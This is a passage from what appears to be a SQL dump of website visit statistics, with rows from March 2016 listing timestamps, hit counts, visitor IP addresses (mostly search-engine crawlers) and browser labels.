(18633,1457676764,1,1,0,0,'66.102.9.84','chrome'),(18634,1457676965,2,2,0,0,'141.8.132.99','other'),(18635,1457676967,11,11,0,0,'141.8.183.14','other'),(18636,1457676968,24,24,0,0,'141.8.184.18','other'),(18637,1457676971,8,8,0,0,'93.158.152.9','other'),(18638,1457676973,3,3,0,0,'5.255.253.53','other'),(18639,1457676975,12,12,0,0,'178.154.149.11','other'),(18640,1457677026,1,0,1,0,'66.249.66.162',''),(18641,1457677111,1,1,0,0,'37.187.95.107','other'),(18642,1457677141,3,2,1,0,'66.249.66.162',''),(18643,1457677247,2,0,2,0,'66.249.66.158',''),(18644,1457677459,1,1,0,0,'8.29.198.26','other'),(18645,1457677776,2,2,0,0,'91.196.178.71','firefox'),(18646,1457678113,1,1,0,0,'198.46.255.75','firefox'),(18647,1457678214,2,1,1,0,'66.249.66.166',''),(18648,1457678309,1,0,1,0,'66.249.66.158',''),(18649,1457678570,1,0,1,0,'66.249.66.162',''),(18650,1457678615,3,2,1,0,'66.249.66.158',''),(18651,1457678659,5,2,3,0,'66.249.66.162',''),(18652,1457678743,1,0,1,0,'68.180.229.232',''),(18653,1457679010,1,0,1,0,'66.249.66.133',''),(18654,1457679020,1,1,0,0,'217.69.133.223','other'),(18655,1457679303,1,1,0,0,'217.69.133.219','other'),(18656,1457679604,3,3,0,0,'91.196.178.67','chrome'),(18657,1457679649,1,0,1,0,'66.249.66.166',''),(18658,1457679720,1,1,0,0,'66.249.92.95','other'),(18659,1457679751,1,1,0,0,'66.249.66.158','other'),(18660,1457679838,2,2,0,0,'66.249.66.162','other'),(18661,1457679853,1,1,0,0,'91.196.178.71','firefox'),(18662,1457680013,3,1,2,0,'66.249.66.166',''),(18663,1457680194,1,1,0,0,'37.187.94.47','other'),(18664,1457680668,1,1,0,0,'66.249.66.166','other'),(18665,1457680878,1,0,1,0,'66.249.66.158',''),(18666,1457681192,4,2,2,0,'66.249.66.162',''),(18667,1457681295,2,0,2,0,'66.249.66.129',''),(18668,1457681711,1,1,0,0,'91.196.178.169','chrome'),(18669,1457681847,3,3,0,0,'66.249.66.162','other'),(18670,1457681981,1,1,0,0,'82.145.211.212','other'),(18671,1457682113,1,1,0,0,'37.187.95.146','other'),(18672,1457682242,2,2,0,0,'66.249.66.158','other'),(18673,1457682459,1,1,0,0,'66.249.66.166','other'),(18674,1457682759,1,1,0,0,'37.187.94.17','other'),(18675,1457682770,3,0,3,0,'68.180.229.232',''),(18676,1457682799,1,1,0,0,'94.179.92.176','firefox'),(18677,1457683069,1,1,0,0,'66.249.66.129','other'),(18678,1457683150,1,1,0,0,'51.255.65.20','other'),(18679,1457683212,2,0,2,0,'66.249.66.162',''),(18680,1457683420,1,1,0,0,'66.249.66.158','other'),(18681,1457683448,1,0,1,0,'66.249.66.166',''),(18682,1457683513,1,1,0,0,'46.200.234.125','chrome'),(18683,1457683801,11,11,0,0,'141.8.184.18','other'),(18684,1457683802,15,15,0,0,'178.154.149.11','other'),(18685,1457683913,1,1,0,0,'5.255.253.100','other'),(18686,1457683916,1,1,0,0,'93.158.152.9','other'),(18687,1457683925,1,1,0,0,'40.77.167.79','other'),(18688,1457683980,1,1,0,0,'37.187.95.59','other'),(18689,1457684078,1,1,0,0,'157.55.39.101','other'),(18690,1457684112,3,3,0,0,'141.8.183.14','other'),(18691,1457684294,2,2,0,0,'93.72.31.149','chrome'),(18692,1457684521,1,1,0,0,'37.187.94.72','other'),(18693,1457684585,1,1,0,0,'217.69.133.223','other'),(18695,1457684724,1,1,0,0,'92.112.109.243','chrome'),(18696,1457684748,1,1,0,0,'217.69.133.225','other'),(18697,1457684749,1,1,0,0,'217.69.133.226','other'),(18698,1457684750,1,1,0,0,'217.69.133.221','other'),(18699,1457684884,4,0,4,0,'66.249.66.162',''),(18700,1457684885,2,0,2,0,'66.249.66.166',''),(18701,1457684955,1,1,0,0,'217.69.133.67','other'),(18702,1457684958,1,0,1,0,'66.249.66.190',''),(18703,1457685055,4,0,4,0,'66.249.66.158',''),(18704,1457685084,1,1,0,0,'176.241.109.84','firefox'),(18705,1457685269,1,0,1,0,'66.249.66.129',''),(18706,1457685532,1,1,0,0,'157.55.39.101','other'),(18707,1457685614,1,1,0,0,'91.196.177.15','firefox'),(18708,1457685772,1,1,0,0,'66.249.66.158','other'),(18709,1457685863,1,1,0,0,'193.104.183.24','firefox'),(18710,1457686289,1,1,0,0,'82.145.211.212','other'),(18711,1457686430,1,1,0,0,'91.196.178.71','firefox'),(18712,1457686833,1,0,1,0,'68.180.229.232',''),(18713,1457686867,1,1,0,0,'92.112.73.174','chrome'),(18714,1457687021,1,1,0,0,'91.196.178.69','chrome'),(18715,1457687097,3,0,3,0,'66.249.66.162',''),(18716,1457687126,9,0,9,0,'66.249.66.158',''),(18717,1457687179,1,1,0,0,'91.196.178.131','firefox'),(18718,1457687612,1,1,0,0,'37.187.94.216','other'),(18719,1457687695,1,1,0,0,'37.187.94.127','other'),(18720,1457687823,1,1,0,0,'37.187.95.59','other'),(18721,1457687888,1,1,0,0,'94.178.251.70','chrome'),(18722,1457687967,1,1,0,0,'82.145.211.212','other'),(18723,1457688243,1,1,0,0,'157.55.39.101','other'),(18724,1457688284,2,0,2,0,'66.249.66.166',''),(18725,1457688353,1,1,0,0,'8.29.198.26','other'),(18726,1457688397,1,1,0,0,'66.249.93.90','chrome'),(18727,1457688544,1,1,0,0,'94.231.188.10','firefox'),(18728,1457688771,1,1,0,0,'51.255.65.83','other'),(18729,1457688772,2,0,2,0,'66.249.66.190',''),(18730,1457688824,6,0,6,0,'66.249.66.162',''),(18731,1457688852,3,0,3,0,'66.249.66.158',''),(18732,1457688911,1,1,0,0,'91.196.177.15','firefox'),(18733,1457689032,1,1,0,0,'89.38.150.47','firefox'),(18734,1457689496,1,1,0,0,'157.55.39.225','other'),(18735,1457689507,1,0,1,0,'66.249.66.166',''),(18736,1457690026,1,1,0,0,'91.196.178.67','chrome'),(18737,1457690198,1,1,0,0,'217.69.133.225','other'),(18738,1457690299,1,1,0,0,'157.55.39.101','other'),(18739,1457690341,2,0,2,0,'66.249.66.162',''),(18740,1457690470,1,1,0,0,'62.210.215.100','chrome'),(18741,1457690530,1,1,0,0,'66.249.92.103','other'),(18742,1457690532,1,1,0,0,'217.69.133.84','other'),(18743,1457690536,1,1,0,0,'217.69.133.85','other'),(18744,1457690663,1,1,0,0,'217.69.133.215','other'),(18746,1457690701,1,1,0,0,'91.196.178.39','firefox'),(18747,1457690782,1,0,1,0,'68.180.229.232',''),(18748,1457690871,1,1,0,0,'37.187.94.157','other'),(18749,1457691458,1,1,0,0,'78.111.190.56','firefox'),(18750,1457691617,1,0,1,0,'66.249.66.158',''),(18751,1457692105,1,1,0,0,'91.196.178.35','firefox'),(18752,1457692260,1,1,0,0,'94.231.188.10','firefox'),(18753,1457692275,1,1,0,0,'62.210.215.100','chrome'),(18754,1457692680,1,0,1,0,'66.249.66.162',''),(18755,1457692916,1,1,0,0,'91.196.178.71','firefox'),(18756,1457692935,1,0,1,0,'66.249.66.158',''),(18757,1457693188,1,1,0,0,'93.158.152.9','other'),(18758,1457693578,1,1,0,0,'51.255.65.15','other'),(18759,1457694123,1,1,0,0,'91.196.178.67','chrome'),(18760,1457694223,1,1,0,0,'193.110.162.146','chrome'),(18761,1457694304,3,2,1,0,'66.249.66.158',''),(18762,1457694341,1,0,1,0,'68.180.229.232',''),(18763,1457694346,2,1,1,0,'66.249.66.162',''),(18764,1457694442,1,1,0,0,'195.234.6.11','chrome'),(18765,1457694473,2,1,1,0,'66.249.66.162',''),(18766,1457694474,1,0,1,0,'66.249.66.166',''),(18767,1457694518,1,1,0,0,'66.249.93.86','other'),(18768,1457694582,1,1,0,0,'46.149.85.125','opera'),(18769,1457695378,3,0,3,0,'66.249.66.158',''),(18770,1457695383,1,0,1,0,'66.249.66.162',''),(18771,1457695748,1,1,0,0,'207.46.13.106','other'),(18772,1457695764,1,1,0,0,'37.52.20.0','firefox'),(18773,1457695799,1,1,0,0,'94.179.94.177','chrome'),(18774,1457695975,1,1,0,0,'37.187.95.112','other'),(18775,1457695999,1,1,0,0,'66.249.93.86','chrome'),(18776,1457696045,1,1,0,0,'217.69.133.68','other'),(18777,1457696144,1,1,0,0,'91.196.178.70','firefox'),(18778,1457696621,1,1,0,0,'217.69.133.84','other'),(18779,1457696622,1,1,0,0,'217.69.133.215','other'),(18780,1457696715,1,1,0,0,'207.46.13.106','other'),(18781,1457696935,1,1,0,0,'178.54.28.31','firefox'),(18782,1457697018,1,0,1,0,'66.249.66.158',''),(18783,1457697351,1,1,0,0,'94.179.208.25','chrome'),(18784,1457697570,1,1,0,0,'141.8.184.18','other'),(18785,1457697883,1,1,0,0,'66.249.93.86','other'),(18786,1457697902,2,0,2,0,'68.180.229.232',''),(18787,1457698139,1,1,0,0,'207.241.229.224','other'),(18788,1457698312,1,1,0,0,'51.255.65.83','other'),(18789,1457698519,2,0,2,0,'66.249.66.162',''),(18790,1457698824,1,1,0,0,'37.187.95.86','other'),(18791,1457699047,1,1,0,0,'91.196.178.133','firefox'),(18792,1457699276,1,1,0,0,'8.29.198.26','other'),(18793,1457699434,1,0,1,0,'66.249.66.158',''),(18794,1457699670,1,1,0,0,'91.196.178.71','firefox'),(18795,1457700229,4,0,4,0,'68.180.229.232',''),(18796,1457700252,1,1,0,0,'91.196.178.69','firefox'),(18797,1457700279,2,0,2,0,'66.249.66.162',''),(18798,1457700486,1,1,0,0,'178.154.149.11','other'),(18799,1457701334,1,1,0,0,'217.69.133.223','other'),(18800,1457701371,1,1,0,0,'157.55.39.225','other'),(18801,1457701443,1,1,0,0,'66.249.93.94','other'),(18802,1457701685,1,1,0,0,'66.249.92.103','other'),(18803,1457701710,1,0,1,0,'66.249.66.158',''),(18804,1457701750,1,1,0,0,'51.255.65.84','other'),(18805,1457701762,1,1,0,0,'66.249.66.133','other'),(18806,1457701951,1,1,0,0,'94.178.83.69','opera'),(18807,1457702068,1,1,0,0,'217.69.133.215','other'),(18808,1457702202,1,1,0,0,'217.69.133.84','other'),(18809,1457702281,1,1,0,0,'141.8.184.18','other'),(18810,1457702466,1,1,0,0,'51.255.65.24','other'),(18811,1457702477,1,0,1,0,'66.249.66.166',''),(18812,1457702486,2,2,0,0,'66.249.66.162','other'),(18813,1457702606,1,1,0,0,'40.77.167.79','other'),(18814,1457702831,1,0,1,0,'66.249.66.158',''),(18815,1457703058,1,1,0,0,'51.255.65.71','other'),(18816,1457703243,1,0,1,0,'66.249.66.129',''),(18817,1457703244,1,0,1,0,'66.249.66.133',''),(18818,1457703259,2,2,0,0,'141.8.184.18','other'),(18819,1457703263,2,2,0,0,'178.154.149.11','other'),(18820,1457703267,1,1,0,0,'141.8.183.14','other'),(18821,1457703268,1,1,0,0,'91.196.178.133','chrome'),(18822,1457703271,1,1,0,0,'141.8.132.99','other'),(18823,1457703282,1,1,0,0,'5.255.253.53','other'),(18824,1457703285,2,2,0,0,'130.193.51.45','other'),(18825,1457703383,1,1,0,0,'62.210.215.100','chrome'),(18826,1457703385,1,1,0,0,'5.135.247.248','chrome'),(18827,1457703388,1,1,0,0,'46.105.245.164','chrome'),(18828,1457703505,1,1,0,0,'91.196.178.167','chrome'),(18829,1457703665,2,2,0,0,'157.55.39.225','other'),(18830,1457703668,1,1,0,0,'66.249.66.166','other'),(18831,1457703872,1,1,0,0,'207.46.13.106','other'),(18832,1457703975,1,0,1,0,'66.249.66.158',''),(18833,1457704047,1,1,0,0,'51.255.65.6','other'),(18834,1457704108,1,1,0,0,'51.255.65.2','other'),(18835,1457704200,1,1,0,0,'51.255.65.7','other'),(18836,1457704202,2,0,2,0,'66.249.66.162',''),(18837,1457704429,2,2,0,0,'40.77.167.79','other'),(18838,1457704471,1,1,0,0,'51.255.65.55','other'),(18839,1457704532,9,9,0,0,'66.249.66.158','other'),(18840,1457704628,1,1,0,0,'66.249.66.133','other'),(18841,1457704724,1,1,0,0,'92.113.127.205','chrome'),(18842,1457704782,1,0,1,0,'68.180.229.232',''),(18843,1457705035,1,1,0,0,'66.249.93.86','other'),(18844,1457705123,2,1,1,0,'66.249.66.162',''),(18845,1457705457,1,1,0,0,'178.154.149.11','other'),(18846,1457705778,2,0,2,0,'68.180.229.232',''),(18847,1457706104,1,1,0,0,'66.249.66.162','other'),(18848,1457706190,1,1,0,0,'51.255.65.91','other'),(18849,1457706402,1,1,0,0,'51.255.65.71','other'),(18850,1457706475,1,1,0,0,'130.193.37.21','other'),(18851,1457706702,1,0,1,0,'66.249.66.166',''),(18852,1457706774,2,2,0,0,'217.69.133.220','other'),(18853,1457706775,1,1,0,0,'217.69.133.223','other'),(18854,1457707006,2,0,2,0,'66.249.66.162',''),(18855,1457707035,1,1,0,0,'51.255.65.58','other'),(18856,1457707243,1,1,0,0,'66.249.66.158','other'),(18857,1457707866,2,2,0,0,'217.69.133.218','other'),(18858,1457707889,1,0,1,0,'66.249.66.166',''),(18859,1457707920,1,1,0,0,'157.55.39.101','other'),(18860,1457708358,1,0,1,0,'68.180.229.232',''),(18861,1457708585,1,1,0,0,'93.158.152.26','other'),(18862,1457708727,3,3,0,0,'66.249.66.158','other'),(18863,1457708863,1,1,0,0,'66.249.93.94','other'),(18864,1457708944,1,0,1,0,'66.249.66.162',''),(18865,1457709213,1,1,0,0,'46.201.240.112','firefox'),(18866,1457709504,2,2,0,0,'66.249.66.190','other'),(18867,1457709583,1,1,0,0,'178.154.189.204','other'),(18868,1457709689,3,1,2,0,'66.249.66.158',''),(18869,1457709693,1,0,1,0,'66.249.66.166',''),(18870,1457709898,3,2,1,0,'66.249.66.166',''),(18871,1457710022,2,2,0,0,'66.249.66.162','other'),(18872,1457710099,1,1,0,0,'8.29.198.25','other'),(18873,1457710184,1,1,0,0,'164.132.161.81','other'),(18874,1457710230,2,2,0,0,'37.9.122.203','other'),(18875,1457710234,1,1,0,0,'178.154.189.203','other'),(18876,1457710237,1,1,0,0,'207.46.13.106','other'),(18877,1457710301,3,3,0,0,'66.249.66.129','other'),(18878,1457710474,1,1,0,0,'141.8.184.11','other'),(18879,1457710477,1,1,0,0,'130.193.51.102','other'),(18880,1457710480,2,2,0,0,'141.8.184.18','other'),(18881,1457710534,1,1,0,0,'31.172.191.135','msie'),(18882,1457710597,2,2,0,0,'66.249.66.158','other'),(18883,1457710830,2,2,0,0,'66.249.66.190','other'),(18884,1457711165,1,1,0,0,'51.255.65.9','other'),(18885,1457711302,1,1,0,0,'66.249.66.133','other'),(18886,1457711465,1,0,1,0,'68.180.229.232',''),(18887,1457711543,2,2,0,0,'66.249.66.158','other'),(18888,1457711608,1,0,1,0,'66.249.66.162',''),(18889,1457712193,2,2,0,0,'66.249.66.162','other'),(18890,1457712323,3,3,0,0,'66.249.66.133','other'),(18891,1457712362,1,1,0,0,'91.196.178.104','chrome'),(18892,1457712414,1,1,0,0,'66.249.93.86','other'),(18893,1457712467,1,1,0,0,'217.69.133.223','other'),(18894,1457712551,1,1,0,0,'66.249.92.99','other'),(18895,1457712981,1,1,0,0,'94.179.40.109','firefox'),(18896,1457713053,1,1,0,0,'217.69.133.220','other'),(18897,1457713079,2,2,0,0,'93.158.152.9','other'),(18898,1457713100,6,1,5,0,'66.249.66.158',''),(18899,1457713153,1,0,1,0,'66.249.66.162',''),(18900,1457713431,1,1,0,0,'217.69.133.218','other'),(18901,1457714080,1,0,1,0,'66.249.66.158',''),(18902,1457714149,1,1,0,0,'164.132.161.89','other'),(18903,1457714215,1,0,1,0,'66.249.66.166',''),(18904,1457714341,1,1,0,0,'66.249.66.129','other'),(18905,1457714360,3,1,2,0,'66.249.66.162',''),(18906,1457714527,1,1,0,0,'66.249.66.158','other'),(18907,1457714712,3,2,1,0,'66.249.66.166',''),(18908,1457715517,3,3,0,0,'178.154.149.11','other'),(18909,1457715520,2,2,0,0,'141.8.183.14','other'),(18910,1457715523,4,4,0,0,'141.8.184.18','other'),(18911,1457715806,2,1,1,0,'66.249.66.166',''),(18912,1457715877,1,1,0,0,'66.249.93.86','other'),(18913,1457716060,2,2,0,0,'178.154.189.204','other'),(18914,1457716436,1,1,0,0,'66.249.66.158','other'),(18915,1457716584,3,3,0,0,'66.249.66.166','other'),(18916,1457716719,1,1,0,0,'164.132.161.93','other'),(18917,1457717063,1,1,0,0,'82.145.219.199','other'),(18918,1457717104,2,2,0,0,'66.249.66.162','other'),(18919,1457717105,8,8,0,0,'141.8.184.18','other'),(18920,1457717108,14,14,0,0,'178.154.149.11','other'),(18921,1457717111,6,6,0,0,'141.8.183.14','other'),(18922,1457717116,1,1,0,0,'93.158.152.9','other'),(18923,1457717214,1,1,0,0,'66.249.66.190','other'),(18924,1457717399,3,3,0,0,'66.249.66.158','other'),(18925,1457717448,1,1,0,0,'51.255.65.60','other'),(18926,1457717916,1,0,1,0,'66.249.66.166',''),(18927,1457718018,1,1,0,0,'207.46.13.106','other'),(18928,1457718419,2,1,1,0,'66.249.66.166',''),(18929,1457718441,3,3,0,0,'66.249.66.158','other'),(18930,1457718457,1,0,1,0,'68.180.229.232',''),(18931,1457719185,1,1,0,0,'217.69.133.219','other'),(18932,1457719187,2,2,0,0,'217.69.133.217','other'),(18933,1457719199,1,1,0,0,'91.196.178.69','firefox'),(18934,1457719424,1,1,0,0,'66.249.93.94','other'),(18935,1457719436,1,1,0,0,'217.69.133.85','other'),(18936,1457719830,9,9,0,0,'141.8.184.18','other'),(18937,1457719835,10,10,0,0,'178.154.149.11','other'),(18938,1457720040,3,0,3,0,'68.180.229.232',''),(18939,1457721005,1,0,1,0,'68.180.229.232',''),(18940,1457721018,1,1,0,0,'8.29.198.26','other'),(18941,1457721153,1,1,0,0,'40.77.167.79','other'),(18942,1457721412,2,0,2,0,'66.249.66.166',''),(18943,1457721766,1,1,0,0,'66.249.66.162','other'),(18944,1457722066,4,4,0,0,'141.8.184.18','other'),(18945,1457722068,4,4,0,0,'178.154.149.11','other'),(18946,1457722082,1,1,0,0,'141.8.183.14','other'),(18947,1457722461,1,0,1,0,'66.249.66.166',''),(18948,1457722881,1,1,0,0,'66.249.92.103','other'),(18949,1457722927,1,1,0,0,'207.46.13.106','other'),(18950,1457723158,2,2,0,0,'66.249.66.166','other'),(18951,1457723696,1,0,1,0,'66.249.66.158',''),(18952,1457723785,1,1,0,0,'91.124.182.203','firefox'),(18953,1457723891,7,7,0,0,'141.8.183.14','other'),(18954,1457723892,1,1,0,0,'217.69.133.226','other'),(18955,1457723893,1,1,0,0,'217.69.133.68','other'),(18957,1457723894,7,7,0,0,'178.154.149.11','other'),(18958,1457723895,5,5,0,0,'141.8.184.18','other'),(18959,1457724023,1,1,0,0,'180.76.15.140','other'),(18960,1457724312,2,2,0,0,'217.69.133.222','other'),(18961,1457724479,1,1,0,0,'78.111.186.152','chrome'),(18962,1457724694,2,0,2,0,'68.180.229.232',''),(18963,1457724742,1,1,0,0,'66.249.66.166','other'),(18964,1457724839,2,2,0,0,'217.69.133.84','other'),(18965,1457724848,1,1,0,0,'217.69.133.219','other'),(18967,1457725367,1,1,0,0,'91.196.178.168','other'),(18968,1457725516,1,1,0,0,'176.31.121.196','firefox'),(18969,1457725666,1,1,0,0,'66.249.66.158','other'),(18970,1457725928,1,0,1,0,'66.249.66.166',''),(18971,1457726039,1,1,0,0,'178.154.189.204','other'),(18972,1457726073,1,1,0,0,'66.249.66.162','other'),(18973,1457726310,1,1,0,0,'130.193.37.21','other'),(18974,1457726312,1,1,0,0,'141.8.132.97','other'),(18975,1457726314,1,1,0,0,'141.8.142.88','other'),(18976,1457726316,1,1,0,0,'141.8.142.10','other'),(18977,1457726318,1,1,0,0,'141.8.184.18','other'),(18978,1457726320,1,1,0,0,'178.154.149.11','other'),(18979,1457726625,1,1,0,0,'66.249.93.90','other'),(18980,1457727165,1,1,0,0,'157.55.39.101','other'),(18981,1457727739,1,0,1,0,'68.180.229.232',''),(18982,1457727811,1,0,1,0,'66.249.66.190',''),(18983,1457727837,5,5,0,0,'80.91.162.99','other'),(18984,1457727942,1,1,0,0,'46.211.2.254','other'),(18985,1457728093,2,2,0,0,'141.8.184.18','other'),(18986,1457728159,1,1,0,0,'157.55.39.225','other'),(18987,1457728163,2,2,0,0,'141.8.183.14','other'),(18988,1457728171,3,3,0,0,'178.154.149.11','other'),(18989,1457728179,2,2,0,0,'5.255.253.100','other'),(18990,1457728186,1,1,0,0,'141.8.132.99','other'),(18991,1457728190,1,1,0,0,'5.255.253.10','other'),(18992,1457728194,1,1,0,0,'5.255.253.9','other'),(18993,1457728197,1,1,0,0,'130.193.51.43','other'),(18994,1457728201,1,1,0,0,'130.193.51.81','other'),(18995,1457728202,2,0,2,0,'66.249.66.162',''),(18996,1457728204,1,1,0,0,'5.255.253.30','other'),(18997,1457728208,1,1,0,0,'5.255.253.55','other'),(18998,1457728211,1,1,0,0,'141.8.142.8','other'),(18999,1457728215,1,1,0,0,'5.255.253.62','other'),(19000,1457728218,1,1,0,0,'141.8.142.55','other'),(19001,1457728222,1,1,0,0,'141.8.132.2','other'),(19002,1457728362,1,1,0,0,'91.124.182.203','firefox'),(19003,1457728653,1,1,0,0,'51.255.65.12','other'),(19004,1457728950,1,0,1,0,'68.180.229.232',''),(19005,1457729140,1,1,0,0,'66.249.66.166','other'),(19006,1457729404,1,1,0,0,'51.255.65.57','other'),(19007,1457729527,2,2,0,0,'40.77.167.79','other'),(19008,1457729685,1,1,0,0,'217.69.133.225','other'),(19009,1457729876,1,0,1,0,'66.249.66.158',''),(19010,1457730067,15,15,0,0,'141.8.184.18','other'),(19011,1457730080,1,1,0,0,'93.158.152.9','other'),(19012,1457730083,1,1,0,0,'141.8.184.11','other'),(19013,1457730087,1,1,0,0,'141.8.132.99','other'),(19014,1457730117,1,1,0,0,'5.255.253.53','other'),(19015,1457730120,1,1,0,0,'141.8.142.60','other'),(19016,1457730123,1,1,0,0,'141.8.142.88','other'),(19017,1457730226,1,1,0,0,'66.249.93.90','other'),(19018,1457730290,1,0,1,0,'68.180.229.232',''),(19019,1457730445,1,1,0,0,'217.69.133.215','other'),(19020,1457730447,1,1,0,0,'217.69.133.85','other'),(19021,1457730754,1,1,0,0,'217.69.133.216','other'),(19022,1457730755,1,1,0,0,'217.69.133.219','other'),(19023,1457731492,1,1,0,0,'178.34.182.154','other'),(19024,1457731666,1,1,0,0,'66.249.66.162','other'),(19025,1457731866,1,1,0,0,'8.29.198.25','other'),(19026,1457731933,1,1,0,0,'62.210.215.100','chrome'),(19027,1457731992,11,11,0,0,'178.154.149.11','other'),(19028,1457731995,14,14,0,0,'141.8.184.18','other'),(19029,1457732120,1,1,0,0,'157.55.39.101','other'),(19030,1457732135,4,4,0,0,'80.91.162.99','other'),(19031,1457732449,1,1,0,0,'164.132.161.70','other'),(19032,1457732574,2,0,2,0,'68.180.229.232',''),(19033,1457732935,1,0,1,0,'66.249.66.162',''),(19034,1457733303,2,1,1,0,'66.249.66.162',''),(19035,1457733511,1,1,0,0,'66.249.92.99','other'),(19036,1457733545,1,0,1,0,'66.249.66.158',''),(19037,1457734031,2,2,0,0,'66.249.66.158','other'),(19038,1457734169,1,1,0,0,'40.77.167.79','other'),(19039,1457734214,1,1,0,0,'37.9.122.203','other'),(19040,1457734294,4,4,0,0,'178.154.149.11','other'),(19041,1457734296,11,11,0,0,'141.8.184.18','other'),(19042,1457734306,1,1,0,0,'130.193.37.21','other'),(19043,1457734308,1,1,0,0,'141.8.132.97','other'),(19044,1457734310,1,1,0,0,'141.8.132.79','other'),(19045,1457734313,1,1,0,0,'141.8.132.2','other'),(19046,1457734317,5,5,0,0,'141.8.183.14','other'),(19047,1457734324,2,2,0,0,'93.158.152.9','other'),(19048,1457734522,37,37,0,0,'91.209.51.22','other'),(19049,1457734659,1,1,0,0,'164.132.161.44','other'),(19050,1457734806,2,0,2,0,'68.180.229.232',''),(19051,1457734847,1,1,0,0,'51.255.65.35','other'),(19052,1457735037,2,1,1,0,'66.249.66.166',''),(19053,1457735045,1,1,0,0,'217.69.133.68','other'),(19054,1457735319,1,1,0,0,'188.93.56.216','firefox'),(19055,1457735337,6,6,0,0,'178.154.149.11','other'),(19056,1457735339,8,8,0,0,'141.8.184.18','other'),(19057,1457735573,1,1,0,0,'217.69.133.226','other'),(19058,1457735746,1,1,0,0,'130.193.37.21','other'),(19059,1457735837,9,9,0,0,'141.8.183.14','other'),(19060,1457735881,3,3,0,0,'5.255.253.53','other'),(19061,1457735981,1,1,0,0,'157.55.39.225','other'),(19062,1457736242,13,13,0,0,'141.8.184.18','other'),(19063,1457736273,1,1,0,0,'141.8.184.22','other'),(19064,1457736278,13,13,0,0,'178.154.149.11','other'),(19065,1457736279,1,1,0,0,'217.69.133.218','other'),(19066,1457736280,1,1,0,0,'217.69.133.216','other'),(19067,1457736668,1,1,0,0,'207.46.13.106','other'),(19068,1457736681,1,1,0,0,'217.69.133.219','other'),(19069,1457736764,7,7,0,0,'141.8.183.14','other'),(19070,1457736775,8,8,0,0,'93.158.152.9','other'),(19071,1457736782,2,2,0,0,'130.193.37.21','other'),(19072,1457736783,2,2,0,0,'5.255.253.100','other'),(19073,1457736786,7,7,0,0,'5.255.253.53','other'),(19074,1457736803,1,0,1,0,'68.180.229.232',''),(19075,1457736815,2,2,0,0,'141.8.132.99','other'),(19076,1457736888,1,0,1,0,'66.249.66.162',''),(19077,1457737424,1,1,0,0,'66.249.93.94','other'),(19078,1457737563,1,0,1,0,'66.249.66.158',''),(19079,1457737965,1,1,0,0,'164.132.161.51','other'),(19080,1457738049,1,1,0,0,'40.77.167.79','other'),(19081,1457738052,1,1,0,0,'66.249.66.166','other'),(19082,1457738577,3,0,3,0,'66.249.66.158',''),(19083,1457738607,1,1,0,0,'158.69.27.74','chrome'),(19084,1457738923,1,0,1,0,'68.180.229.232',''),(19085,1457738992,9,9,0,0,'141.8.183.14','other'),(19086,1457739345,1,1,0,0,'164.132.161.68','other'),(19087,1457739368,8,8,0,0,'141.8.184.18','other'),(19088,1457739369,8,8,0,0,'93.158.152.9','other'),(19089,1457739527,9,9,0,0,'178.154.149.11','other'),(19090,1457739531,5,5,0,0,'5.255.253.53','other'),(19091,1457739533,1,1,0,0,'66.249.66.162','other'),(19092,1457739547,1,1,0,0,'66.249.66.168','other'),(19093,1457739562,11,11,0,0,'66.249.66.158','other'),(19094,1457739600,1,1,0,0,'66.249.66.129','other'),(19095,1457739619,3,3,0,0,'66.249.66.190','other'),(19096,1457739624,1,1,0,0,'157.55.39.101','other'),(19097,1457739728,2,1,1,0,'66.249.66.166',''),(19098,1457739743,1,1,0,0,'66.249.66.133','other'),(19099,1457740259,1,1,0,0,'51.255.65.65','other'),(19100,1457740308,13,13,0,0,'141.8.184.18','other'),(19101,1457740322,9,9,0,0,'141.8.132.99','other'),(19102,1457740550,1,1,0,0,'164.132.161.69','other'),(19103,1457740765,26,26,0,0,'130.193.37.21','other'),(19104,1457740985,2,2,0,0,'40.77.167.79','other'),(19105,1457741082,6,6,0,0,'5.255.253.100','other'),(19106,1457741085,25,25,0,0,'178.154.149.11','other'),(19107,1457741086,12,12,0,0,'5.255.253.53','other'),(19108,1457741131,17,17,0,0,'93.158.152.9','other'),(19109,1457741150,24,24,0,0,'141.8.183.14','other'),(19110,1457741210,11,11,0,0,'141.8.184.18','other'),(19111,1457741225,3,3,0,0,'141.8.132.99','other'),(19112,1457741816,3,3,0,0,'130.193.37.21','other'),(19113,1457741934,1,0,1,0,'66.249.66.166',''),(19114,1457742174,1,1,0,0,'66.249.66.158','other'),(19115,1457742334,1,1,0,0,'217.69.133.218','other'),(19116,1457742464,1,0,1,0,'68.180.229.232',''),(19117,1457742703,1,1,0,0,'8.29.198.26','other'),(19118,1457743274,1,1,0,0,'207.46.13.106','other'),(19119,1457743873,1,1,0,0,'141.8.184.18','other'),(19120,1457743874,3,3,0,0,'130.193.37.21','other'),(19121,1457743875,1,1,0,0,'141.8.132.99','other'),(19122,1457743876,1,1,0,0,'93.158.152.9','other'),(19123,1457743877,1,1,0,0,'5.255.253.53','other'),(19124,1457743878,1,1,0,0,'178.154.149.11','other'),(19125,1457744427,1,1,0,0,'40.77.167.79','other'),(19126,1457744483,1,0,1,0,'66.249.66.162',''),(19127,1457744591,1,1,0,0,'66.249.92.99','other'),(19128,1457744671,1,0,1,0,'66.249.66.158',''),(19129,1457744713,2,2,0,0,'66.249.66.166','other'),(19130,1457745115,1,1,0,0,'66.249.66.158','other'),(19131,1457745636,1,1,0,0,'66.249.66.133','other'),(19132,1457745777,3,3,0,0,'66.249.66.190','other'),(19133,1457745840,1,1,0,0,'207.46.13.106','other'),(19134,1457745880,3,3,0,0,'141.8.184.18','other'),(19135,1457745881,8,8,0,0,'141.8.183.14','other'),(19136,1457745950,1,0,1,0,'66.249.66.166',''),(19137,1457746092,9,9,0,0,'178.154.149.11','other'),(19138,1457746094,4,4,0,0,'5.255.253.100','other'),(19139,1457746095,4,4,0,0,'93.158.152.9','other'),(19140,1457746096,4,4,0,0,'141.8.132.99','other'),(19141,1457746097,4,4,0,0,'5.255.253.53','other'),(19142,1457746112,2,2,0,0,'130.193.37.21','other'),(19143,1457746345,2,2,0,0,'66.249.66.166','other'),(19144,1457746750,1,1,0,0,'66.249.66.129','other'),(19145,1457746772,2,1,1,0,'66.249.66.158',''),(19146,1457747579,2,1,1,0,'66.249.66.162',''),(19147,1457747742,15,15,0,0,'66.249.66.158','other'),(19148,1457747879,1,0,1,0,'66.249.66.166',''),(19149,1457747951,10,10,0,0,'178.154.149.11','other'),(19150,1457747952,17,17,0,0,'141.8.183.14','other'),(19151,1457747953,11,11,0,0,'141.8.184.18','other'),(19152,1457747954,6,6,0,0,'5.255.253.53','other'),(19153,1457747957,1,1,0,0,'130.193.37.21','other